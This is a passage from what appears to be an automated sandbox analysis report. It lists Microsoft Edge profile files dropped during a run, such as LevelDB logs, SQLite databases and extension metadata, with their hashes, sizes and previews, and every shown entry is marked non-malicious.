                                                                                                                                                            SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                            MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                            SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                            SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                            SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:MANIFEST-000001.

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\000003.log

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):209
                                                                                                                                                            Entropy (8bit):1.8784775129881184
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:FQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlX:qTCTCTCTCTCTCTCTCTCTCT
                                                                                                                                                            MD5:478D49D9CCB25AC14589F834EA70FB9E
                                                                                                                                                            SHA1:5D30E87D66E279F8815AFFE4C691AAF1D577A21E
                                                                                                                                                            SHA-256:BB6CC6DF54CF476D95409032C79E065F4E10D512E73F7E16018E550456F753D5
                                                                                                                                                            SHA-512:FB5431054A23D3C532568B1F150873D9130DBC4A88BE19BC2A4907D0DC2888C5B55993154EAD4A6C466E2173092B8705684A6802B850F051639E1F2457387471
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\CURRENT (copy)

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):16
                                                                                                                                                            Entropy (8bit):3.2743974703476995
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                            MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                            SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                            SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                            SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:MANIFEST-000001.

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):279
                                                                                                                                                            Entropy (8bit):5.203643052050931
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:iO/wmQB1wkn23oH+Tcwt8aVdg2KLl9lM+q2Pwkn23oH+Tcwt8aPrqIFUv:7/vfYeb0LzlM+vYfYebL3FUv
                                                                                                                                                            MD5:60D7035DE5E1D8F439AA4B61F81507E5
                                                                                                                                                            SHA1:E29B30234A5CD7FEDF19C9D918004D7AE778AA3E
                                                                                                                                                            SHA-256:340BEFD8CC0960A60C73C85993114B07DC87405732ED99B612FB17B2911EE7E3
                                                                                                                                                            SHA-512:BC3AB9D25DC8A89154B27BFA05675945F2B389330AF1F60B0E9A4F4FD1F485ACA95C93B145484E0B18ADB0CEED7FDA6FAB9A40C528703207780CBF9B655C2A55
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:2025/01/06-17:04:58.395 7fc Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules since it was missing..2025/01/06-17:04:58.418 7fc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\MANIFEST-000001

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:OpenPGP Secret Key
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):41
                                                                                                                                                            Entropy (8bit):4.704993772857998
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                            MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                            SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                            SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                            SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\000001.dbtmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):16
                                                                                                                                                            Entropy (8bit):3.2743974703476995
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                            MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                            SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                            SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                            SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:MANIFEST-000001.

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\000003.log

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):209
                                                                                                                                                            Entropy (8bit):1.8784775129881184
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:FQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlX:qTCTCTCTCTCTCTCTCTCTCT
                                                                                                                                                            MD5:478D49D9CCB25AC14589F834EA70FB9E
                                                                                                                                                            SHA1:5D30E87D66E279F8815AFFE4C691AAF1D577A21E
                                                                                                                                                            SHA-256:BB6CC6DF54CF476D95409032C79E065F4E10D512E73F7E16018E550456F753D5
                                                                                                                                                            SHA-512:FB5431054A23D3C532568B1F150873D9130DBC4A88BE19BC2A4907D0DC2888C5B55993154EAD4A6C466E2173092B8705684A6802B850F051639E1F2457387471
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\CURRENT (copy)

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):16
                                                                                                                                                            Entropy (8bit):3.2743974703476995
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                            MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                            SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                            SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                            SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:MANIFEST-000001.

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):283
                                                                                                                                                            Entropy (8bit):5.18527791886862
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:iO/GSaFFB1wkn23oH+Tcwt86FB2KLl9dM+q2Pwkn23oH+Tcwt865IFUv:7/GofYeb/FFLzdM+vYfYeb/WFUv
                                                                                                                                                            MD5:47408AD3BD8BD5CE194DBAD23F5F3008
                                                                                                                                                            SHA1:84A053754BDE4A13F97FD41FF05601C278246A1C
                                                                                                                                                            SHA-256:E75A8CB0485D75D74182D3E11A28CEF078FAAF48C4EC12B89049C0E17EAA1908
                                                                                                                                                            SHA-512:16C7BC5043F3DD40B379426A976A94628D84BB0D0BAAADEFEE9B54EE2ADCEF07F02333B8A98293CE7EC8DDA61DEB40FA8705191197C56A8A9020CA0CBEFC8C6D
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:2025/01/06-17:04:58.423 7fc Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts since it was missing..2025/01/06-17:04:58.436 7fc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\MANIFEST-000001

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:OpenPGP Secret Key
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):41
                                                                                                                                                            Entropy (8bit):4.704993772857998
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                            MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                            SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                            SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                            SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\000003.log

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1197
                                                                                                                                                            Entropy (8bit):1.8784775129881184
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW:
                                                                                                                                                            MD5:A2A3B1383E3AAC2430F44FC7BF3E447E
                                                                                                                                                            SHA1:B807210A1205126A107A5FE25F070D2879407AA4
                                                                                                                                                            SHA-256:90685D4E050DA5B6E6F7A42A1EE21264A68F1734FD3BD4A0E044BB53791020A2
                                                                                                                                                            SHA-512:396FAB9625A2FF396222DBC86A0E2CDE724C83F3130EE099F2872AED2F2F2ECE13B0853D635F589B70BD1B5E586C05A3231D68CAF9E46B6E2DAC105A10D0A1C8
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):319
                                                                                                                                                            Entropy (8bit):5.248812371775563
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:iO/w+Q+q2Pwkn23oH+Tcwt8NIFUtN/QgZmwz/QQVkwOwkn23oH+Tcwt8+eLJ:7/5vYfYebpFUtN/5/z/T5JfYebqJ
                                                                                                                                                            MD5:5C7A80FE5D46169DBB766047DED4BC18
                                                                                                                                                            SHA1:0847695B50F19A4ABBED013E932BC0950250F06D
                                                                                                                                                            SHA-256:8C262514E264D47AEC3131770658482BC0F904601F3F5F9806B7F422A43E7DFE
                                                                                                                                                            SHA-512:0A6873DE8C68A9AC04D11499199BFEF63CFD46871F325AD0A8E70A434A28030981F619925AD7720EC2C8CA98AF1D48948227107A73652CF9CEB29E5C5ED0C31C
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:2025/01/06-17:04:59.244 6b8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2025/01/06-17:04:59.245 6b8 Recovering log #3.2025/01/06-17:04:59.245 6b8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG.old (copy)

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):319
                                                                                                                                                            Entropy (8bit):5.248812371775563
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:iO/w+Q+q2Pwkn23oH+Tcwt8NIFUtN/QgZmwz/QQVkwOwkn23oH+Tcwt8+eLJ:7/5vYfYebpFUtN/5/z/T5JfYebqJ
                                                                                                                                                            MD5:5C7A80FE5D46169DBB766047DED4BC18
                                                                                                                                                            SHA1:0847695B50F19A4ABBED013E932BC0950250F06D
                                                                                                                                                            SHA-256:8C262514E264D47AEC3131770658482BC0F904601F3F5F9806B7F422A43E7DFE
                                                                                                                                                            SHA-512:0A6873DE8C68A9AC04D11499199BFEF63CFD46871F325AD0A8E70A434A28030981F619925AD7720EC2C8CA98AF1D48948227107A73652CF9CEB29E5C5ED0C31C
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:2025/01/06-17:04:59.244 6b8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2025/01/06-17:04:59.245 6b8 Recovering log #3.2025/01/06-17:04:59.245 6b8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\ExtensionActivityComp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 1, cookie 0x1, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):4096
                                                                                                                                                            Entropy (8bit):0.3169096321222068
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:lSWbNFl/sl+ltl4ltllOl83/XWEEabIDWzdWuAzTgdWj3FtFIU:l9bNFlEs1ok8fDEPDadUTgd81Z
                                                                                                                                                            MD5:2554AD7847B0D04963FDAE908DB81074
                                                                                                                                                            SHA1:F84ABD8D05D7B0DFB693485614ECF5204989B74A
                                                                                                                                                            SHA-256:F6EF01E679B9096A7D8A0BD8151422543B51E65142119A9F3271F25F966E6C42
                                                                                                                                                            SHA-512:13009172518387D77A67BBF86719527077BE9534D90CB06E7F34E1CCE7C40B49A185D892EE859A8BAFB69D5EBB6D667831A0FAFBA28AC1F44570C8B68F8C90A4
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\ExtensionActivityEdge

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 8, cookie 0x8, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):32768
                                                                                                                                                            Entropy (8bit):0.40981274649195937
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:TL1WK3iOvwxwwweePKmJIOAdQBVA/kjo/TJZwJ9OV3WOT/5eQQ:Tmm+/9ZW943WOT/
                                                                                                                                                            MD5:1A7F642FD4F71A656BE75B26B2D9ED79
                                                                                                                                                            SHA1:51BBF587FB0CCC2D726DDB95C96757CC2854CFAD
                                                                                                                                                            SHA-256:B96B6DDC10C29496069E16089DB0AB6911D7C13B82791868D583897C6D317977
                                                                                                                                                            SHA-512:FD14EADCF5F7AB271BE6D8EF682977D1A0B5199A142E4AB353614F2F96AE9B49A6F35A19CC237489F297141994A4A16B580F88FAC44486FCB22C05B2F1C3F7D1
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j............M.....8...b..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_0\_metadata\computed_hashes.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):429
                                                                                                                                                            Entropy (8bit):5.809210454117189
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                                                                                            MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                                                                                            SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                                                                                            SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                                                                                                                            SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 39, 1st free page 10, free pages 4, cookie 0x45, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):159744
                                                                                                                                                            Entropy (8bit):0.5241404324800358
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:56U+bGzPDLjGQLBE3up+U0jBo4tgi3JMe9xJDECVjN:5R+GPXBBE3upb0HtTTDxVj
                                                                                                                                                            MD5:241322143A01979D346689D9448AC8C0
                                                                                                                                                            SHA1:DD95F97EE1CCB8FD9026D2156DE9CB8137B816D1
                                                                                                                                                            SHA-256:65EEBDEC4F48A111AC596212A1D71C3A5CFA996797500E5344EEABDFA02527C8
                                                                                                                                                            SHA-512:9C7241462A9DADEF25D8EEB1C14BABFBA65C451EBAFBC068B9856E4EF0EB6F894A44686CBB0D1F46C7F546335D0C53A3E386E6C1A017082DE127F8F9C0A54BD2
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:SQLite format 3......@ .......'...........E......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:modified
                                                                                                                                                            Size (bytes):8720
                                                                                                                                                            Entropy (8bit):0.32778212170214727
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:Cl/0A/J3+t76Y4QZZofU99pO0BYlcqR4EZY4QZvGA:WFhHQws9LdGbBQZGA
                                                                                                                                                            MD5:26305DEAB269D29CF8FF3DBF3A6CBF33
                                                                                                                                                            SHA1:B87DD9CF6C28632348A93337F24B5DC59CA9BCB6
                                                                                                                                                            SHA-256:C4E159C5E75EF09F808B6C5D82F4CF9C00D1C61B8C9113B455ABCBDC86FD9FEA
                                                                                                                                                            SHA-512:099D7D566F44B43A441BDC27B13D4B71E3E1E8DE57E3F5907B3021B10DEB69B687806FEE0BFD6831C6E366CA3865D8C528C1A7904DC7523883E687D1AE370933
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:..............p....'....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps (copy)

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):115717
                                                                                                                                                            Entropy (8bit):5.183660917461099
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                            MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                            SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                            SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                            SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps Icons

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 11, cookie 0x3, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):45056
                                                                                                                                                            Entropy (8bit):3.548601076678917
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:zj9P0WyQkQeracp773pLIgam6IDP/KbtERKToaAQhf:zdxye2Np7hzP/hRKc09
                                                                                                                                                            MD5:4DD6BDDFCA7D63320B2382CA12AE0307
                                                                                                                                                            SHA1:EDE0F13873157AFA93E9C1146DBDF4DB65FFA2DE
                                                                                                                                                            SHA-256:13E40EE2BA408905C3E066ED41F7B8E1CDD6A955C29B04F7AF5454FEE0A34316
                                                                                                                                                            SHA-512:025ACD5628C0934C6512A9FC94F942C4DFA04FE44EB7D137636671C50C664CC9036BBC5C736307D492620CBF284B40FC7A955A4367BA490412AB03BDC985FB65
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):406
                                                                                                                                                            Entropy (8bit):5.240504706170167
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:7/pTe8+vYfYeb8rcHEZrELFUtNpTAZ/zpTANV5JfYeb8rcHEZrEZSJ:7/0tYfYeb8nZrExgN4YJfYeb8nZrEZe
                                                                                                                                                            MD5:BD12C49599F2AD18C540D9184435716C
                                                                                                                                                            SHA1:9D530720278D43234C6C8E063331EBD694D2AD6B
                                                                                                                                                            SHA-256:6E701E6AC98F5F677D0F5A5715309DD84B3E2C03C1A4445C82100BE788CAE256
                                                                                                                                                            SHA-512:A8CE2CD68FD5030D9F940A95B6FD71C5EF365ABD4F2CE5FC65947386FA14B7BD2332922172D36F9B0794B97DD3BA443E262830CAFB7F5660F2A1D51B58C17C87
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:2025/01/06-17:05:00.244 14bc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2025/01/06-17:05:00.245 14bc Recovering log #3.2025/01/06-17:05:00.245 14bc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG.old (copy)

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):406
                                                                                                                                                            Entropy (8bit):5.240504706170167
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:7/pTe8+vYfYeb8rcHEZrELFUtNpTAZ/zpTANV5JfYeb8rcHEZrEZSJ:7/0tYfYeb8nZrExgN4YJfYeb8nZrEZe
                                                                                                                                                            MD5:BD12C49599F2AD18C540D9184435716C
                                                                                                                                                            SHA1:9D530720278D43234C6C8E063331EBD694D2AD6B
                                                                                                                                                            SHA-256:6E701E6AC98F5F677D0F5A5715309DD84B3E2C03C1A4445C82100BE788CAE256
                                                                                                                                                            SHA-512:A8CE2CD68FD5030D9F940A95B6FD71C5EF365ABD4F2CE5FC65947386FA14B7BD2332922172D36F9B0794B97DD3BA443E262830CAFB7F5660F2A1D51B58C17C87
                                                                                                                                                            Malicious:false
